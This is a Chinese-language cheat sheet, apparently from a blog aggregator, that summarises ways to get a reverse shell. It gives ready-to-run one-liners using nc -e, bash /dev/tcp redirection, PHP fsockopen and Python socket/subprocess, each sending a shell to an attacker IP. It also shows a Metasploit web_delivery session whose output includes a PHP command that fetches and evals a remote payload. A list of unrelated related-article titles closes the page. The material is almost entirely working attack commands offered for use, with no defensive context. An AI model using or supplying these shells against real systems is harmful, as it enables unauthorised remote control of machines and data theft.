python反弹shell_反弹Shell小结
1、NC反弹shell
1.1、正向反弹shell
服务器
nc -lvvp 7777 -e /bin/bash
攻击机
nc server-ip 7777
1.2、反向反弹shell
攻击机
nc -lvvp 7777
服务器
nc -e /bin/bash Client-ip 7777
1.3、不带-e反弹:
2、 bash反弹shell
2.1 bash -i
攻击机
nc -lvvp 7777
服务器
bash -i >& /dev/tcp/Client-IP/7777 0>&1
3、PHP反弹shell
3.1 php -r
php -r '$sock=fsockopen("192.168.118.128",4444);exec("/bin/sh -i &3 2>&3");'
进行url编码:
4、python反弹
4.1、python -c
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
5、metasploit
5.1、web_delivery
use exploit/multi/script/web_delivery
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.118.128
lhost => 192.168.118.128
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT 8888
SRVPORT => 8888
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.118.128:6666
[*] Using URL: http://0.0.0.0:8888/mDIK5UGRA8Qs76
[*] Local IP: http://192.168.118.128:8888/mDIK5UGRA8Qs76
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.118.128:8888/mDIK5UGRA8Qs76'));"
python反弹shell_反弹Shell小结相关推荐
- python反弹shell_反弹shell的几种方式总结
假设本机地址10.10.10.11,监听端口443. 1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i ...
- python反弹shell_反弹shell的各种姿势
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...
- mysql 反弹shell_反弹shell升级成交互式shell
实验环境: A : kali 虚拟机 B: centos7.5 虚拟机 1. A 机 kali 虚拟机 设置监听 端口 root@kali64:~# nc -lvvp 9001 # 端口随便定义,没被 ...
- python交互式shell_交互式 shell 玩转 Python
Python 编程语言已经成为 IT 中使用的最流行的语言之一.成功的一个原因是它可以用来解决各种问题.从网站开发到数据科学.机器学习到任务自动化,Python 生态系统有丰富的框架和库.本文将介绍 ...
- python 执行shell_用Python调用Shell命令
Python经常被称作"胶水语言",因为它能够轻易地操作其他程序,轻易地包装使用其他语言编写的库,也当然可以用Python调用Shell命令. 用Python调用Shell命令有如 ...
- python interactive shell_[python] 介绍几个Interactive Shell (上)
用Python编程,免不得需要做些实验,你可以python interactive shell 里面试一下某个表达式是否正确,某个包 是怎样使用的,用dir(obj)看看一个对象都有些啥属性,用hel ...
- python调用脚本或shell的方式
python调用脚本或shell有下面三种方式: os.system() 特点: (1)可以调用脚本. (2)可以判断是否正确执行. (3)满足不了标准输出 && 错误 command ...
- python自带的shell、其性能优于ipython_python3.4 shell
实验1 目的和要求(1) (2) (3) (4) (5) (6) (7) 开始 python 编程 了解什么是 python? 了解 python 的特性 学习下载和安装 python 学习执行 py ...
- python自带的shell、其性能优于ipython吗_根据强化的性质和目的可以分成()。 A.自然强化物和人为的近似强化物B.积极强化和消极...
根据强化的性质和目的可以分成(). A.自然强化物和人为的近似强化物B.积极强化和消极 更多相关问题 [填空题]以下程序是以只读的方式打开文件,并统计文件中字符个数.则程序中空白处应填写为(__). ...
最新文章
- NVIDIA GPU自动调度神经网络
- 17 个方面,综合对比 Kafka、RabbitMQ、RocketMQ、ActiveMQ
- Python 技术篇-利用Office VBA实现word文档转化为pdf文档实例演示
- 深入redis内部--字典实现
- Java黑皮书课后题第8章:*8.32(几何:三角形面积)编写一个方法,使用下面的方法头,返回一个三角形的面积。编写一个程序,提示用户输入三角形的三个点,然后显示三角形的面积
- 牛客 - 树上求和(贪心+树形dp)
- iOS sha1加密算法
- 在日本山区流域使用支持向量机和 bagging、boosting 和 stacking 集成机器学习框架改进滑坡评估--文献阅读
- 「钓鱼攻击」免杀钓鱼上线捆绑利器
- 如何打造一个搞垮公司的产品?
- 设计素材画面太平淡?优秀案例网页教你如何用色彩丰富画
- 把自定义的demuxer加入ffmpeg源码
- 彩虹猫(Geometry dash auto speedhack)病毒的代码.bat
- SQL server 创建数据库代码,非常详细
- LU分解法求解方程组(C语言)
- 多线程编程 -wait(),notify()/notityAll()方法
- AR路由器ETH端口使用方法
- UI基本控件(一):UIScrollView
- hdu 1728:逃离迷宫
- 【NVIDIA】显卡报错:NVIDIA-SMI has failed because it couldn‘t communicate with the NVIDIA driver
热门文章
- 树莓派配置原装CSI接口摄像头以及生成/dev/video0设备节点
- 计算机视觉物体识别的过程,计算机视觉之从OpenCV到物体识别(二)
- 大话存储1——存储系统的发展,计算机I/O
- 2019年7月1日 星期一 今日计划
- 虚拟机Ubuntu内鼠标闪烁终极解决方案
- MySQL function方法(中文转首字母大写)
- 线程和进程/阻塞和挂起以及那些sleep,wait()和notify()方法详解
- 轮式里程计与激光雷达进行标定2--里程计运动学模型方法(理论+实现代码)
- 零基础入门STM32编程(三)
- c语言生成随机数并进行四则运算